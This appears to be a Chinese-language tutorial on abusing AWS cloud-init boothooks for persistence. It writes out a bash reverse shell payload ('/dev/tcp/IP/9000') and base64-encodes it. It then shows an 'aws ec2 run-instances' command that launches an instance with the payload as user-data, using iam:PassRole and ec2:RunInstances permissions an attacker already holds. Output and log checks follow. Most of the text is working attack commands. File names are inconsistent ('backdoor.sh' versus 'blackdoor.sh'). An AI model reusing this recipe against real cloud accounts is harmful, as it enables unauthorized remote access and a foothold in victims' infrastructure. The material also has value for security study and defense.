AWS CloudInit
cloud-init package是Canonical建構的開源應用程式,用於引導在雲端環境中的Linux image。AWS CloudInit是一種用於自動化EC2 instance初始化和設置的工具,可以在EC2 instance啟動過程中執行各種初始化任務。
AWS Cloud Boothook
AWS Cloud Boothhook是用於EC2 instance啟動期間執行自定義命令的機制。具體來說,boothook是cloudinit配置的一部份,主要用於:
Reverse shell
Build reverse shell code
建立reverse shell,這裡用bash做示範
backdoor.sh
1
2
3
|
#!/bin/bash
echo "Hello World" >> hello.txt
/bin/bash -i >& /dev/tcp/IP/9000 0>&1 # Revese shell範例
|
backdoor_encoded.sh
1
|
base64 -i blackdoor.sh > blackdoor_encoded.sh # 這是Mac的寫法
|
啟動新的EC2 instance
攻擊者已經獲取合法有限權限,其中包括啟動新實例所需的權限。
iam:PassRole
ec2:RunInstances
1
2
3
4
5
6
7
|
> aws ec2 run-instances \
--image-id ami-xxxxxxxxxxxxxxxxx \
--instance-type t2.micro \
--key-name YourKeyPairName \
--key-name SSHKey \
--user-data file://backdoor_encoded.sh \
--security-group-ids SecurityGroup
|
ssh key一定要寫,要不然建完發現進不去…
Output:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
{
"Groups": [],
"Instances": [
{
"AmiLaunchIndex": 0,
"ImageId": "ami-XXXXXXXXXXXXX",
"InstanceId": "i-XXXXX",
"InstanceType": "t2.micro",
"LaunchTime": "Date",
"Monitoring": {
"State": "disabled"
},
"Placement": {
"AvailabilityZone": "XXXXXXX",
"GroupName": "",
"Tenancy": "default"
},
"PrivateDnsName": "....",
"PrivateIpAddress": ".....",
"ProductCodes": [],
"PublicDnsName": "",
"State": {
"Code": 0,
"Name": "pending"
},
:...skipping...
|
有正常的輸出代表建立EC2成功
測試
bash內容有寫入資料到hello.txt,可以先查看這個檔案有沒有資料
或是
1
2
|
這裡儲存著cloud-init的log
tail /var/log/cloud-init.log
|
1
2
|
這裡儲存cloud-init 輸出log
tail /var/log/cloud-init-output.log
|